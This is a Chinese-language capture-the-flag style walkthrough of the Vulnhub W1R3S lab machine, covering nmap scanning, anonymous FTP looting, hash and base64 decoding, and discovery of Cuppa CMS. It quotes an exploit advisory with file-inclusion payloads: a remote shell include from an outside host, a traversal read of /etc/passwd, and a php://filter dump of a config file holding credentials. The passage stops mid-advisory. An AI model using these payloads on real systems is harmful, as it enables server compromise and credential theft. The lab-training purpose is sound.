Vulnnhub | W1R3S靶场练习

admin 2025年4月23日01:15:32评论9 views字数 38685阅读128分57秒阅读模式
Vulnnhub | W1R3S靶场练习
Vulnnhub | W1R3S靶场练习
Vulnnhub | W1R3S靶场练习
鼎新安全
don't give up and don't give in !

一、主机发现

先查看本机与靶机所在网段,这里是eth1网卡是和靶机在同一网段,所以只查看eth1就行了

┌──(kali㉿kali)-[~]└─$ ifconfigeth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 192.168.16.128  netmask 255.255.255.0  broadcast 192.168.16.255        inet6 fe80::20c:29ff:fe0a:61a4  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:0a:61:a4  txqueuelen 1000  (Ethernet)        RX packets 14  bytes 2560 (2.5 KiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 35  bytes 3250 (3.1 KiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

先用arp-scan或者nmap扫一下eth1网段的存活主机,这两个工具探测出的靶机ip是192.168.15.129

命令 参数 介绍
arp-scan
--interface=eth1
通过 eth1 接口扫描本地网络中的设备,并显示它们的 IP 和 MAC 地址。
arp-scan
-l
-l

 或 --localnet 选项会自动检测 eth1 接口的 IP 地址和子网掩码,并扫描整个本地子网。
nmap
-sn
跳过端口扫描,仅检测目标主机是否在线
┌──(kali㉿kali)-[~]└─$ sudo arp-scan --interface=eth1 -l Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.16.1    00:50:56:c0:00:08       (Unknown)192.168.16.2    00:50:56:f8:96:9c       (Unknown)192.168.16.129  00:0c:29:37:f4:3d       (Unknown)192.168.16.254  00:50:56:fb:ab:2b       (Unknown)4 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.10.0: 256 hosts scanned in 1.874 seconds (136.61 hosts/sec). 4 responded┌──(kali㉿kali)-[~]└─$ sudo nmap -sn 192.168.16.0/24     Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:30 CSTNmap scan report for 192.168.16.1Host is up (0.00019s latency).MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.16.2Host is up (0.000082s latency).MAC Address: 00:50:56:F8:96:9C (VMware)Nmap scan report for 192.168.16.129Host is up (0.000071s latency).MAC Address: 00:0C:29:37:F4:3D (VMware)Nmap scan report for 192.168.16.254Host is up (0.00015s latency).MAC Address: 00:50:56:FB:AB:2B (VMware)Nmap scan report for 192.168.16.128Host is up.Nmap done: 256 IP addresses (5 hosts up) scanned in 5.94 seconds

二、信息收集

接下来就是探测靶机上开放了哪些端口

参数 介绍
-sT
使用TCP协议扫描
--min-rate 10000
以10000的速率进行扫描
-p-
扫描所有端口
-oA
以nmap、gnmap和xml格式保存扫描结果到指定文件
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.16.129 -oA protsStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:43 CSTNmap scan report for 192.168.16.129Host is up (0.00030s latency).Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh80/tcp   open  http3306/tcp open  mysqlMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

在遇到扫描结果有很多端口时,我们最好把探测的端口使用字符处理命令把端口号处理好后,再赋值给一个变量,方便调用

命令 参数 解释
grep
open ports.nmap
从指定文件中筛选出包含 "open" 的行。
awk
-F  '/' '{print $1}'
使用 / 作为分隔符,提取每行的第一个字段(即端口号)
paste
-sd ','
将提取的端口号列表以逗号分隔合并成一行
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ','21,22,80,3306┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ prots=$(grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ',')┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ echo$prots21,22,80,3306

知道靶机的端口号后,就可以进行更细致的探测了,使用默认扫描脚本获取目标端口运行的服务和操作系统信息。ftp服务探测到了三个可访问目录,并提示可以使用anonymous用户登录ftp,nmap进行大胆猜测Linux的版本是Linux 3.10 - 4.11

端口 服务 描述
21
ftp
vsftpd 2.0.8 or later
22
ssh
OpenSSH 7.2p2
80
http
Apache/2.4.18 (Ubuntu)
3306
mysql
MySQL
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT -sV -sC -O -p$prots    //在输入要扫描的端口时,输入变量$prots然后按Tab键补全会自动将变量转换为其存储的端口┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.16.129 -oA detailStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:15 CSTNmap scan report for 192.168.16.129Host is up (0.00052s latency).                                                                                              PORT     STATE SERVICE VERSION21/tcp   open  ftp     vsftpd 2.0.8 or later| ftp-syst: |   STAT: | FTP server status:|      Connected to ::ffff:192.168.16.128|      Logged in as ftp|      TYPE: ASCII|      No session bandwidth limit|      Session timeoutin seconds is 300|      Control connection is plain text|      Data connections will be plain text|      At session startup, client count was 4|      vsFTPd 3.0.3 - secure, fast, stable|_End of status| ftp-anon: Anonymous FTP login allowed (FTP code 230)| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works3306/tcp open  mysql   MySQL (unauthorized)MAC Address: 00:0C:29:37:F4:3D (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purpose|storage-miscRunning (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.16 - 4.6 (91%), Linux 4.10 (91%), Linux 4.4 (91%), Linux 2.6.32 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.8 (91%), Linux 5.0 - 5.4 (91%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopService Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 23.03 seconds

再使用udp协议扫描常见的top20端口。结果都是打开或过滤状态

参数 介绍
-sU
使用udp协议扫描
-top-ports 20
常见端口前20
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sU -top-ports 20 192.168.16.129 -oA unpscanStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:17 CSTNmap scan report for 192.168.16.129Host is up (0.00025s latency).PORT      STATE         SERVICE53/udp    open|filtered domain67/udp    open|filtered dhcps68/udp    open|filtered dhcpc69/udp    open|filtered tftp123/udp   open|filtered ntp135/udp   open|filtered msrpc137/udp   open|filtered netbios-ns138/udp   open|filtered netbios-dgm139/udp   open|filtered netbios-ssn161/udp   open|filtered snmp162/udp   open|filtered snmptrap445/udp   open|filtered microsoft-ds500/udp   open|filtered isakmp514/udp   open|filtered syslog520/udp   open|filtered route631/udp   open|filtered ipp1434/udp  open|filtered ms-sql-m1900/udp  open|filtered upnp4500/udp  open|filtered nat-t-ike49152/udp open|filtered unknownMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds

再用nmap的漏洞扫描脚本来探测靶机可能存在的漏洞。扫到了一个“/wordpress/wp-login.php”登录页面

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap --script=vuln -p21,80,22,3306 192.168.16.129 -oA vulnStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 16:03 CSTPre-scan script results:| broadcast-avahi-dos: |   Discovered hosts:|     224.0.0.251|   After NULL UDP avahi packet DoS (CVE-2011-1002).|_  Hosts are all up (not vulnerable).Nmap scan report for 192.168.16.129Host is up (0.00026s latency).                                                                                                                                              PORT     STATE SERVICE                                                                                 21/tcp   open  ftp                                                                                     22/tcp   open  ssh                                                                                     80/tcp   open  http                                                                                    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                       |_http-dombased-xss: Couldn't find any DOM based XSS.                                                  |_http-csrf: Couldn't find any CSRF vulnerabilities.                                                   | http-slowloris-check:                                                                                |   VULNERABLE:                                                                                        |   Slowloris DOS attack                                                                               |     State: LIKELY VULNERABLE                                                                         |     IDs:  CVE:CVE-2007-6750                                                                          |       Slowloris tries to keep many connections to the target web server open and hold                |       them open as long as possible.  It accomplishes this by opening connections to                 |       the target web server and sending a partial request. By doing so, it starves                   |       the http server's resources causing Denial Of Service.|       |     Disclosure date: 2009-09-17|     References:|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750|_      http://ha.ckers.org/slowloris/| http-enum: |_  /wordpress/wp-login.php: Wordpress login page.3306/tcp open  mysqlMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 348.15 seconds

再搜集完关键服务和系统信息后,我们先排个攻击顺序,先查看ftp服务器中的三个可访问目录有什么,然后

三、寻找漏洞

使用anonymous用户登录ftp服务器,登录成功后提示我们将文件传输模式改为二进制模式"binary",使用"?"命令查看当前用户可以使用的命令,查看当前目录文件,是nmap扫描到的那三个目录,进入到content目录查看里面的文件,发现有三个txt文件,使用prompt关闭交互提示方便后面下载文件,使用mget下载文件到本地,另外两个目录中的文件也全都下载下来

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$sudo ftp 192.168.16.129Connected to 192.168.16.129.220 Welcome to W1R3S.inc FTP service.Name (192.168.16.129:kali): anonymous331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> binary200 Switching to Binary mode.ftp> ?Commands may be abbreviated.  Commands are:!               edit            lpage           nlist           rcvbuf          struct$               epsv            lpwd            nmap            recv            suniqueaccount         epsv4           ls              ntrans          reget           systemappend          epsv6           macdef          open            remopts         tenexascii           exit            mdelete         page            rename          throttlebell            features        mdir            passive         reset           tracebinary          fget            mget            pdir            restart         typebye             form            mkdir           pls             rhelp           umaskcase            ftp             mls             pmlsd           rmdirunsetcd              gate            mlsd            preserve        rstatus         usagecdup            get             mlst            progress        runique         userchmod           glob            mode            prompt          send            verboseclose           hash            modtime         proxy           sendport        xferbufcr              help            more            put             set             ?debug           idle            mput            pwd             sitedelete          image           mreget          quit            sizedir             lcd             msend           quote           sndbufdisconnect      less            newer           rate            statusftp> ls229 Entering Extended Passive Mode (|||45744|)150 Here comes the directory listing.drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 contentdrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docsdrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees226 Directory send OK.ftp> cd content250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||46277|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt226 Directory send OK.ftp> promptInteractive mode off.ftp> mget *.txtlocal: 01.txt remote: 01.txt229 Entering Extended Passive Mode (|||42538|)150 Opening BINARY mode data connection for 01.txt (29 bytes).100% |**********************************************************|    29       52.44 KiB/s    00:00 ETA226 Transfer complete.29 bytes received in 00:00 (33.31 KiB/s)local: 02.txt remote: 02.txt229 Entering Extended Passive Mode (|||40061|)150 Opening BINARY mode data connection for 02.txt (165 bytes).100% |**********************************************************|   165      367.04 KiB/s    00:00 ETA226 Transfer complete.165 bytes received in 00:00 (234.88 KiB/s)local: 03.txt remote: 03.txt229 Entering Extended Passive Mode (|||42627|)150 Opening BINARY mode data connection for 03.txt (582 bytes).100% |**********************************************************|   582        1.37 MiB/s    00:00 ETA226 Transfer complete.582 bytes received in 00:00 (897.88 KiB/s)ftp> cd ..250 Directory successfully changed.ftp> cd docs250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||46023|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt226 Directory send OK.ftp> mget worktodo.txtlocal: worktodo.txt remote: worktodo.txt229 Entering Extended Passive Mode (|||40641|)150 Opening BINARY mode data connection for worktodo.txt (138 bytes).100% |**********************************************************|   138      114.30 KiB/s    00:00 ETA226 Transfer complete.138 bytes received in 00:00 (93.91 KiB/s)ftp> cd ..250 Directory successfully changed.ftp> cd new-employees250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||41133|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt226 Directory send OK.ftp> mget employee-names.txtlocal: employee-names.txt remote: employee-names.txt229 Entering Extended Passive Mode (|||44320|)150 Opening BINARY mode data connection for employee-names.txt (155 bytes).100% |**********************************************************|   155      156.37 KiB/s    00:00 ETA226 Transfer complete.155 bytes received in 00:00 (122.76 KiB/s)ftp>

查看刚才下载下来的文件内容,先看三个txt文件的内容,第一行“New FTP Server For W1R3S.inc(新的 FTP 服务器用于 电线公司)”中的"W1R3S"是英文单词"wires",为什么要这样拼写呢?这要讲到一个互联网文化“leetspeak”,详细故事请点击连接了解

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat *.txtNew FTP Server For W1R3S.inc########01ec2d8fc11c493b25029fb1f47f39ce#############SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==############################################___________.__              __      __  ______________________   _________    .__               __    ___/|  |__   ____   /      /  /_   ______   _____   /   _____/    |__| ____   ____    |    |   |  |  _/ __      //   / |   ||       _/ _(__  < _____       |  |/    _/ ___   |    |   |   Y    ___/           /  |   ||    |   /       /            |  |   |    ___   |____|   |___|  /___  >   __/  /   |___||____|_  /______  /_______  / / |__|___|  /___  >                /     /         /                /       /        /  /         /     / The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resources        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ观察下面这串加密的的字符特征为32为十六进制数,可知其为md5加密的字符串如果不确定可以使用“hash-identifier”检测一下01ec2d8fc11c493b25029fb1f47f39ce┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ hash-identifier ##########################################################################     __  __                     __           ______    _____           ##    / /                    /          /__  _  /  _ `         ##      _      __      ____   ___     /_/ /    /         ##        _    /'__`   / ,__    _ `                      ##          / _ _/__, `           _ __   _       ##        _ _ ___ _/____/   _ _     /_____  ____/      ##        /_//_//__//_//___/    /_//_/     /_____/  /___/  v1.2 ##                                                             By Zion3R ##                                                    www.Blackploit.com ##                                                   [email protected] ##########################################################################-------------------------------------------------- HASH: 01ec2d8fc11c493b25029fb1f47f39cePossible Hashs:[+] MD5[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))Least Possible Hashs:[+] RAdmin v2.x[+] NTLM[+] MD4[+] MD2[+] MD5(HMAC)[+] MD4(HMAC)[+] MD2(HMAC)[+] MD5(HMAC(Wordpress))[+] Haval-128[+] Haval-128(HMAC)[+] RipeMD-128[+] RipeMD-128(HMAC)[+] SNEFRU-128[+] SNEFRU-128(HMAC)[+] Tiger-128[+] Tiger-128(HMAC)[+] md5($pass.$salt)[+] md5($salt.$pass)[+] md5($salt.$pass.$salt)[+] md5($salt.$pass.$username)[+] md5($salt.md5($pass))[+] md5($salt.md5($pass))[+] md5($salt.md5($pass.$salt))[+] md5($salt.md5($pass.$salt))[+] md5($salt.md5($salt.$pass))[+] md5($salt.md5(md5($pass).$salt))[+] md5($username.0.$pass)[+] md5($username.LF.$pass)[+] md5($username.md5($pass).$salt)[+] md5(md5($pass))[+] md5(md5($pass).$salt)[+] md5(md5($pass).md5($salt))[+] md5(md5($salt).$pass)[+] md5(md5($salt).md5($pass))[+] md5(md5($username.$pass).$salt)[+] md5(md5(md5($pass)))[+] md5(md5(md5(md5($pass))))[+] md5(md5(md5(md5(md5($pass)))))[+] md5(sha1($pass))[+] md5(sha1(md5($pass)))[+] md5(sha1(md5(sha1($pass))))[+] md5(strtoupper(md5($pass)))--------------------------------------------------

将md5字符串存储再“md5.hash”中,然后使用john撞库尝试破解

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ vim md5.hash             ┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo john md5.hashCreated directory: /root/.johnWarning: detected hashtype"LM", but the string is also recognized as "dynamic=md5($p)"Use the "--format=dynamic=md5($p)" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "HAVAL-128-4"Use the "--format=HAVAL-128-4" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "MD2"Use the "--format=MD2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mdc2"Use the "--format=mdc2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mscash"Use the "--format=mscash" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mscash2"Use the "--format=mscash2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "NT"Use the "--format=NT" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD4"Use the "--format=Raw-MD4" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD5"Use the "--format=Raw-MD5" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD5u"Use the "--format=Raw-MD5u" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-SHA1-AxCrypt"Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "ripemd-128"Use the "--format=ripemd-128" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Snefru-128"Use the "--format=Snefru-128" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "ZipMonster"Use the "--format=ZipMonster" option to force loading these as that type insteadUsing default input encoding: UTF-8Using default target encoding: CP850Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])Warning: poor OpenMP scalability for this hashtype, consider --fork=12Will run 12 OpenMP threadsProceeding with single, rules:SinglePress 'q' or Ctrl-C to abort, almost any other key for statusAlmost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstProceeding with incremental:LM_ASCII0g 0:00:01:39 0.06% 3/3 (ETA: 2025-03-22 16:52) 0g/s 44475Kp/s 44475Kc/s 88951KC/s ARL3P98..ARBD5TESession aborted

过了很久也没有爆出来结果,那我们就用浏览器上网搜一个MD5在线破解工具看看能不能爆破一下。这次使用在线工具破解出来了,结果说这不是密码,请时刻保持怀疑的态度,把这个明文记下来

md5 明文
01ec2d8fc11c493b25029fb1f47f39ce
This is not a password(这不是一个密码)

接下来就是第三个字符串了,根据我一坤年的ctf经验来看,这是一个Base64字符串,是不是,解🐎一下就知道了,果然是的哈

Base64 明文
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
It is easy, but not that easy..(这很容易,但没那么容易。)
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ echo"SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -dIt is easy, but not that easy..

接下来就是这个由ascii码生成的符号拼接起来的公司的logo,感兴趣可以看看这个网站

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat 03.txt___________.__              __      __  ______________________   _________    .__               __    ___/|  |__   ____   /      /  /_   ______   _____   /   _____/    |__| ____   ____    |    |   |  |  _/ __      //   / |   ||       _/ _(__  < _____       |  |/    _/ ___   |    |   |   Y    ___/           /  |   ||    |   /       /            |  |   |    ___   |____|   |___|  /___  >   __/  /   |___||____|_  /______  /_______  / / |__|___|  /___  >                /     /         /                /       /        /  /         /     /

再后面有个公司员工列表,人员列表无论在什么时候都很重要,记下来

名称 职位
Naomi.W
-Manager
Hector.A
IT Dept
Joseph.G
Web Design
Albert.O
Web Design
Gina.L
Inventory
Rico.D
Human Resources
The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resources

最后是两句话是进行了上下翻转和倒叙,我们去浏览器找找有没有在线工具 ,然后我使用的是DeepSeek将其还原了

        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ以下是翻译后的句子:第一句:我不认为这是获取 root 权限的方法!(原句:`I don`t think this is the way to root!`)第二句:我们有很多工作要做,别玩了....(原句:`we have a lot of work to do, stop playing around....`)

目前21端口的这些信息提示我们不让我们继续在21端口这里探测,那我们就去看看3306端口的mysql服务有没有什么惊喜,尝试使用root用户经行空密码登录失败

参数 介绍
-h
指定 MySQL 服务器的主机地址(IP 地址或域名)
-u
指定连接 MySQL 服务器的用户名
-p
执行命令后,系统会提示你输入对应用户的密码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo mysql -h 192.168.16.129 -u root -p Enter password: ERROR 1130 (HY000): Host '192.168.16.128' is not allowed to connect to this MySQL server

既然3306端口不行,那就去查看80端口上的服务是什么,访问后发现是个Apache的默认页面,查看其内容没有什么有用的信息 

  Vulnnhub | W1R3S靶场练习   再看一下源代码中有没有什么,也没有有用的信息 

  Vulnnhub | W1R3S靶场练习   使用gobuster扫描目录能不能找到敏感目录,成功获取了三个目录,看看里面有什么  

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo gobuster dir -u http://192.168.16.129/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [sudo] kali 的密码:===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.16.129/[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/wordpress            (Status: 301) [Size: 320] [--> http://192.168.16.129/wordpress/]/javascript           (Status: 301) [Size: 321] [--> http://192.168.16.129/javascript/]/administrator        (Status: 301) [Size: 324] [--> http://192.168.16.129/administrator/]/server-status        (Status: 403) [Size: 302]Progress: 220560 / 220561 (100.00%)===============================================================Finished===============================================================

  wordpress无法访问

   Vulnnhub | W1R3S靶场练习javascript只显示出了中间件版本、操作系统的ip地址和端口

   Vulnnhub | W1R3S靶场练习   访问administrator是个框架程序管理安装的页面,里面是检测安装环境是否满足安装条件,框架是“Cuppa CMS”,我们点击“Next”按键继续下一步 

  Vulnnhub | W1R3S靶场练习跳转到数据库创建页面了 

  Vulnnhub | W1R3S靶场练习 设置数据库用户名和密码为“litemao”,设置email为“[email protected]”,然后再点击“next”继续安装

   Vulnnhub | W1R3S靶场练习   配置文件和数据表格都成功创建了,但是administrator用户并没有创建成功,而且只有一个“Back”按钮,先看一下页面源代码有没有东西,没有有用的信息,点击"Back"按钮返回

   Vulnnhub | W1R3S靶场练习   Vulnnhub | W1R3S靶场练习   那就使用searchsploit命令在本地搜索一下cuppa的历史漏洞

searchsploit允许用户通过关键词(如软件名称、操作系统、漏洞类型等)在本地 ExploitDB 数据库中搜索公开的漏洞利用代码。找到了一个  

┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ searchsploit cuppa  ----------------------------------------------------------------------- ---------------------- Exploit Title                                                          |  Path----------------------------------------------------------------------- ----------------------Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion         |php/webapps/25971.txt----------------------------------------------------------------------------------------------Shellcodes: No Results  把25971.txt下载到本地  ┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ searchsploit cuppa -m 25971[!] Could not find EDB-ID #  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion      URL: https://www.exploit-db.com/exploits/25971     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt    Codes: OSVDB-94101 Verified: TrueFile Type: C++ source, ASCII text, with very long lines (876)cp: cannot create regular file '/home/kali/'$'351235266346234272344277241346201257''/vlunhub/W1R3S/25971.txt': Permission deniedCopied to: /home/kali/靶机信息/vlunhub/W1R3S/25971.txt  看一下25971.txt内容,漏洞描述为该漏洞为文件包含漏洞,并且无论是在linux和windows运行的cuppa都样适用,漏洞是在alertConfigField.php文件中的第22行的产生的  ┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat 25971.txt Exploit Title   : Cuppa CMS File InclusionDate            : 4 June 2013Exploit Author  : CWH UndergroundSite            : www.2600.in.thVendor Homepage : http://www.cuppacms.com/Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zipVersion         : BetaTested on       : Window and Linux  ,--^----------,--------,-----,-------^--,  | |||||||||   --------'     |          O .. CWH Underground Hacking Team ..  +---------------------------^----------|    _,-------, _________________________|      / XXXXXX /|     /     / XXXXXX /     /    / XXXXXX /______(   / XXXXXX /  / XXXXXX / (________(  ------'VULNERABILITY: PHP CODE INJECTION/alerts/alertConfigField.php (LINE: 22)-----------------------------------------------------------------------------LINE 22:        <?php include($_REQUEST["urlConfig"]); ?>-----------------------------------------------------------------------------DESCRIPTIONAn attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]EXPLOIThttp://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwdMoreover, We could access Configuration.php source code via PHPStreamFor Example:-----------------------------------------------------------------------------http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php-----------------------------------------------------------------------------Base64 Encode Output:-----------------------------------------------------------------------------PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+-----------------------------------------------------------------------------Base64 